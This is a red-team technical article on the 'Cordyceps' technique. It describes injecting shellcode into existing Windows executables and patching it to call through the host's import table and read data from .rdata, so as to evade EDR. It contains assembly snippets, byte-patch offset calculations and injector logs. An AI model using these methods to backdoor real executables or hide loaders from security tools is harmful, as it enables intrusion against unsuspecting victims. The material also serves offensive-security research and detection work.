Cordyceps: Shellcode in EXE Injection
Stealthy shellcode injection into executables to bypass EDR.
Intro
One of the most important things as a RedTeamer is to get Initial Access (IA), aka Remote-Code-Execution (RCE) on a host, typically a Windows Client. A common technique is to send some malicious files to a victim, which when clicked, will execute our payload.
There are many different file types used for this, like ISO, MSI, JS, LNK, VBA…
But I want to focus on EXE (and DLL) files.
This is part of a three-article series:
- See Supermega for an introduction on how to use the SuperMega loader laboratory
- See How EDR works for a discussion of EDR detection principles
- Cordyceps EXE Injection for a discussion of Cordyceps approaches (this)
I published the source code at github.com/dobin/SuperMega.
About this technique
The idea is to integrate shellcode more deeply into existing exe’s. It will take all the goodness of the victim exe, and hopefully allow the loader (carrier & payload) to stay under the radar.
The carrier also resides in an IMAGE section, which makes it more trustworthy.
This can be compared to DLL-Stomping or Process-Hollowing.
Backdooring EXE’s Advantages
Injecting shellcode into an EXE has a few advantages. It keeps most of the original data intact:
- No PEB walk, including API hashing or similar
- Original Imports / IAT
- Code similarity analysis defeated (Machine learning based detection)
- No need for good-code stuffing
- Loader execution in an IMAGE memory region
- no call stack spoofing is required
- origin of threads are IMAGE
Shellcode Injection into PE
Shellcode on Windows cannot directly call syscalls, but has to use
ntdll.dll
mapped in each process. This requires a technique that I
call peb_walk to resolve the function addresses by the DLL- and function names.
A typical writeup is Finding Kernel32 Base and Function Addresses in Shellcode.
It usually involves parsing the process PEB, and then invoking GetProcAddress()
.
From the perspective of a loader-shellcode, querying the API of our peb_walk resolver could look somewhat like this:
LPVOID base = get_module_by_name((const LPWSTR)"kernel32.dll");
LPVOID load_lib = get_func_by_name((HMODULE)base, (LPSTR)"LoadLibraryA";
LPVOID get_proc = get_func_by_name((HMODULE)base, (LPSTR)"GetProcAddress");
HMODULE(WINAPI * _LoadLibraryA)(LPCSTR lpLibFileName)
= (HMODULE(WINAPI*)(LPCSTR)) load_lib;
FARPROC(WINAPI * _GetProcAddress)(HMODULE hModule, LPCSTR lpProcName)
= (FARPROC(WINAPI*)(HMODULE, LPCSTR)) get_proc;
int (WINAPI * _GetEnvironmentVariableW)(
_In_opt_ LPCWSTR lpName,
_Out_opt_ LPWSTR lpBuffer,
_In_ DWORD nSize) = (int (WINAPI*)(
_In_opt_ LPCWSTR lpName,
_Out_opt_ LPWSTR lpBuffer,
_In_opt_ LPCWSTR,
_In_ DWORD nSize)) _GetProcAddress((HMODULE)base, "GetEnvironmentVariableW");
...
The code queries for the address of all the exported DLL functions it requires. The details of how peb_walk works exactly is not important here, but it requires a not insubstantial amount of code.
But, when we inject shellcode into an EXE, what stops us from calling the DLL functions
directly, like the normal code of the executable? Like in the following trivial
example call &MessageBoxW
:
And it turns out, nothing stops us from doing this ourselves.
Cordyceps - shellcode fixups to re-use IAT
All the EXE’s required DLLs and functions are specified in the IAT (Import Address Table) in the PE header. It is a list of DLL names, each having a list of function names to import. The code does not know at which address the DLL function it wants to call is located, so it will just jump to a static location in the IAT. If the DLL function is not yet resolved, the IAT entry will point to the DLL resolver, and write the DLL function’s address in its address instead.
The nice thing is: That the jump from the .text section to the IAT is a relative jump (Debuggers and disassemblers “hide” this fact). It is not affected by ASLR, as all PE sections are loaded and randomized as one blob. Therefore we can fixup our injected shellcode so it reuses the IAT, instead of doing a peb_walk.
IAT call example
In the following example, the call
at address 0x140001017
will jump to the IAT address
stored at 0x140002080
(which is 0x7FF82168AEE0
, the address of the MessageBoxW()
function in ntdll.dll, but we also don’t care
about that).
The MessageBoxW
IAT entry is at 0x2080
.
The offset, as seen by the little-endian call
encoding, is 0x1063
.
The relative offset is 0x140002080 - 0x140001017 - 6 = 0x1063
(note that RIP will point to the next instruction to be executed, so we have to
adjust the offset by the length of the call
instruction, which is 6).
Debuggers and disassemblers usually hide this low-level stuff.
Cordyceps: IAT Fixup step by step
So, we can create this jump by ourselves by patching the shellcode injected in the EXE. I call this the Cordyceps technique.
The issue is that masm assembler cannot create this jump. It has neither its current memory address for a relative jump nor a valid jump target to resolve later. So instead, i patch the assembly source code, replacing the old jump with a placeholder of random bytes. Then in the resulting EXE, patch the placeholder with the correct relative jump.
Let’s have an example and call VirtualAlloc()
via the IAT from our shellcode.
The C source:
char *dest = VirtualAlloc(NULL, 433, 0x3000, p_RW);
The ASM text code generated by cl.exe
from the C source code:
mov r9d, 4
mov r8d, 12288 ; 00003000H
mov edx, 433 ; 000001b1H
xor ecx, ecx
call QWORD PTR __imp_VirtualAlloc
Note that __imp_VirtualAlloc
points to an external symbol,
which would be resolved when linking the ASM source. Let’s remove it
with a placeholder of random bytes, in this case c5 db d7 0a ec af
:
mov r9d, 4
mov r8d, 12288 ; 00003000H
mov edx, 433 ; 000001b1H
xor ecx, ecx
DB 0c5H, 0dbH, 0d7H, 00aH, 0ecH, 0afH ; IAT Reuse for VirtualAlloc
After injecting the shellcode into the target EXE, replace the placeholder bytes with a newly constructed call to the correct IAT entry:
ff 15 f3 dd 0a 00 call qword ptr [rip + 0xaddf3]
Lets get the offset from the assembly instruction: ff 15 f3 dd 0a 00
where ff 15
is the call instruction,
and f3 dd 0a 00
is the offset in little endian, converted: 00 0a dd f3
= 0x0addf3.
Log message when building:
(injector.py ) Replace c5dbd70aecaf at VA 0x14006FB5F with: call to IAT at VA 0x14011D958 (VirtualAlloc)
(asmdisasm.py) [00000000] ff 15 f3 dd 0a 00 call qword ptr [rip + 0xaddf3]
The relative jump offset was calculated like this:
relative_offset = dest_iat_function_rva - current_instruction_rva - 6
= 0x14011D958 - 0x14006FB5F - 6 = 0x0ADDF3
Result:
- No more peb_walk (no
LoadLibrary()
, noGetProcAddress()
etc.) signatures - No telemetry for peb_walk generated
.rdata data reference: The Problem
Shellcode must contain the data it needs for its function calls embedded in its code. This can look highly suspicious.
One option is to encode the data as push instructions, which create the strings on the stack at runtime, and then reference it with the stack pointer RSP. This can be forced to be generated by using the following trick:
wchar_t kernel32_dll_name[] = { 'k','e','r','n','e','l','3','2','.','d','l','l', 0 };
This will make the assembler creating the following code:
mov eax, 107 ; 0000006bH k
mov WORD PTR kernel32_dll_name$[rsp], ax
mov eax, 101 ; 00000065H e
mov WORD PTR kernel32_dll_name$[rsp+2], ax
mov eax, 114 ; 00000072H r
mov WORD PTR kernel32_dll_name$[rsp+4], ax
mov eax, 110 ; 0000006eH n
mov WORD PTR kernel32_dll_name$[rsp+6], ax
mov eax, 101 ; 00000065H e
mov WORD PTR kernel32_dll_name$[rsp+8], ax
mov eax, 108 ; 0000006cH l
mov WORD PTR kernel32_dll_name$[rsp+10], ax
mov eax, 51 ; 00000033H 3
mov WORD PTR kernel32_dll_name$[rsp+12], ax
mov eax, 50 ; 00000032H 2
mov WORD PTR kernel32_dll_name$[rsp+14], ax
mov eax, 46 ; 0000002eH .
mov WORD PTR kernel32_dll_name$[rsp+16], ax
mov eax, 100 ; 00000064H d
mov WORD PTR kernel32_dll_name$[rsp+18], ax
mov eax, 108 ; 0000006cH l
mov WORD PTR kernel32_dll_name$[rsp+20], ax
mov eax, 108 ; 0000006cH l
mov WORD PTR kernel32_dll_name$[rsp+22], ax
xor eax, eax ; \x00
mov WORD PTR kernel32_dll_name$[rsp+24], ax
lea rcx, QWORD PTR kernel32_dll_name$[rsp]
Or alternatively, use a different technique that stores the strings inline in the .text section as bytes, and jumps over it:
lea rax, QWORD PTR msg_content$[rsp]
CALL after_$SG72694
$SG72694 DB 'Hello World!', 00H
after_$SG72694:
POP rcx
.rdata data reference: Solution
What stops us from putting our data into another section, let’s say
.rdata
, and replacing references? All sections, including .rdata
, are ASLR’d together.
So, a relative LEA from .text
to .rdata
is possible (and usual).
A string reference in C:
wchar_t envVarName[] = L"USERPROFILE";
When compiled into text ASM, it will look like this:
$SG72731 DB 'U', 00H, 'S', 00H, 'E', 00H, 'R', 00H, 'P', 00H, 'R', 00H
DB 'O', 00H, 'F', 00H, 'I', 00H, 'L', 00H, 'E', 00H, 00H, 00H
...
lea rcx, OFFSET FLAT:$SG72731
mov rdi, rax
mov rsi, rcx
mov ecx, 24
rep movsb
Remove the $SG* data from the assembly. And then replace the LEA
with a random bytes
placeholder:
DB 094H, 041H, 00aH, 029H, 0f3H, 03bH, 018H ; .rdata Reuse for $SG72731 (rcx)
mov rdi, rax
mov rsi, rcx
mov ecx, 24
rep movsb
And patch the shellcode in the binary, after it got injected: replace
0x94 0x41 0x0a 0x29 0xf3 0x3b 0x18
with lea <reg>, <current-address relative offset>
.
Patched carrier shellcode in injected binary:
Log of adding the string into .rdata
:
(injector.py ) Handling DataReuse Fixup: $SG72731 <- 94410a29f33b18
(injector.py ) Add to .rdata at 0x14011EAA9 (1174185): $SG72731: USERPROFILE
Log of patching the LEA referencing the above data:
(injector.py ) Replace bytes 94410a29f33b18 at VA 0x14008E73E with: LEA rcx .rdata 0x14011EAA9
(asmdisasm.py ) [14008e73e] 48 8d 0d 64 03 09 00 lea rcx, [rip + 0x90364]
Summary
So what is Cordyceps? Nothing else than injecting Shellcode into an EXE file, and then making it call functions via IAT, and reference data in .rdata - exactly like a normal EXE without injected shellcode.
This makes it hard for an EDR to detect something malicious, which would trigger it to perform more detailed analysis or scans.
All calls coming from the carrier originate from an IMAGE memory region. No DLL resolving with a PEB-walk needed, generating less telemetry.